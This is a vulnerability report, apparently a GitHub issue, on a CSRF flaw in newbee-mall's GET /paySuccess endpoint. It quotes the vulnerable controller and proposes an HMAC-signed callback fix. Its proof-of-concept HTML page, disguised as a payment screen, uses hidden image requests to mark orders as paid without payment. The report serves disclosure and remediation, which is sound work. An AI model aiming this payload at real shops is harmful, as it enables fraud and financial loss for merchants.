CSRF Vulnerability in Payment Processing #113

@flashzyc

Summary

A CSRF vulnerability exists in the payment success confirmation endpoint /paySuccess. Attackers can mark orders as paid without actual payment, potentially leading to fraudulent order processing.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        // ❌ Payment endpoints have no CSRF protection
        // No interceptor configured for payment operations
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/OrderController.java (Lines 147-156)

@GetMapping("/paySuccess")
@ResponseBody
public Result paySuccess(@RequestParam("orderNo") String orderNo, @RequestParam("payType") int payType) {
    // ❌ CRITICAL: GET method for payment confirmation!
    // ❌ No CSRF token validation
    // ❌ No actual payment gateway verification
    // ⚠️ Trusts client-side payment confirmation
    String payResult = newBeeMallOrderService.paySuccess(orderNo, payType);
    if (ServiceResultEnum.SUCCESS.getResult().equals(payResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(payResult);
    }
}

Critical Security Flaws:

  1. ❌ Uses GET method for payment confirmation
  2. ❌ No CSRF token validation
  3. ❌ No server-side payment gateway verification
  4. ⚠️ Can be triggered by a simple link click or an embedded image

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Payment Processing</title>
</head>
<body>
    <h2>💳 Processing your payment...</h2>
    <p>Please do not close this window.</p>
    
    <!-- Invisible image triggers payment confirmation -->
    <img src="http://localhost:28089/paySuccess?orderNo=202602051645001&payType=1" 
         style="display:none;"
         onload="document.getElementById('msg').innerHTML='✅ Payment successful!'">
    
    <div id="msg"></div>
    
    <!-- Batch payment confirmation for multiple orders -->
    <script>
        var orders = [
            '202602051645001',
            '202602051645002',
            '202602051645003'
        ];
        
        orders.forEach(function(orderNo) {
            var img = new Image();
            img.src = 'http://localhost:28089/paySuccess?orderNo=' + orderNo + '&payType=1';
        });
    </script>
</body>
</html>

Impact

Fraudulent payment confirmation without actual payment: an attacker can mark orders as paid without completing payment, leading to unauthorized product delivery and financial loss for the business.

CVSS Score: 8.6 (High)
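For the fix, payment confirmation should not come from the user's browser at all: the gateway notifies the server directly over POST with a signed body, the server verifies the signature before calling the existing newBeeMallOrderService.paySuccess(orderNo, payType), and the browser-facing GET /paySuccess endpoint is removed. The controller below is an added example, not code from newbee-mall; the path /pay/notify, the X-Pay-Signature header, the property pay.gateway.notify-secret, the JSON field names and the service package are assumptions.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.util.Base64;
import javax.annotation.Resource;
import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.ObjectMapper;
import ltd.newbee.mall.service.NewBeeMallOrderService; // package assumed
import org.springframework.beans.factory.annotation.Value;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RequestHeader;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class PayNotifyController {
    // Shared secret agreed with the gateway out of band (property name assumed).
    @Value("${pay.gateway.notify-secret}")
    private String notifySecret;
    @Resource
    private NewBeeMallOrderService newBeeMallOrderService;

    // Server-to-server callback: POST only and signed, so a page that merely makes the
    // victim's browser load a URL (as in the PoC above) cannot produce an accepted request.
    @PostMapping(value = "/pay/notify", consumes = "application/json")
    public ResponseEntity<String> payNotify(@RequestHeader("X-Pay-Signature") String signature,
                                            @RequestBody String rawBody) throws Exception {
        if (!signatureMatches(rawBody, signature, notifySecret)) {
            return ResponseEntity.status(401).body("bad signature");
        }
        JsonNode n = new ObjectMapper().readTree(rawBody);
        if (!"SUCCESS".equals(n.path("status").asText())) {
            return ResponseEntity.ok("ignored"); // gateway did not report a completed payment
        }
        // Also compare n.path("amount") with the stored order total first; omitted because the order lookup API is not shown here.
        String r = newBeeMallOrderService.paySuccess(n.path("orderNo").asText(), n.path("payType").asInt());
        return ResponseEntity.ok(r);
    }
    // HMAC-SHA256 over the exact raw body, base64 in the header, compared in constant time.
    static boolean signatureMatches(String rawBody, String b64Sig, String secret) throws Exception {
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(secret.getBytes(StandardCharsets.UTF_8), "HmacSHA256"));
        byte[] expected = mac.doFinal(rawBody.getBytes(StandardCharsets.UTF_8));
        byte[] given;
        try { given = Base64.getDecoder().decode(b64Sig); } catch (IllegalArgumentException e) { return false; }
        return MessageDigest.isEqual(expected, given);
    }
}
```

Because the request must carry a valid HMAC over the body, a cross-site page can no longer confirm a payment by loading a URL, and the order is only marked paid after the gateway itself reports success.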
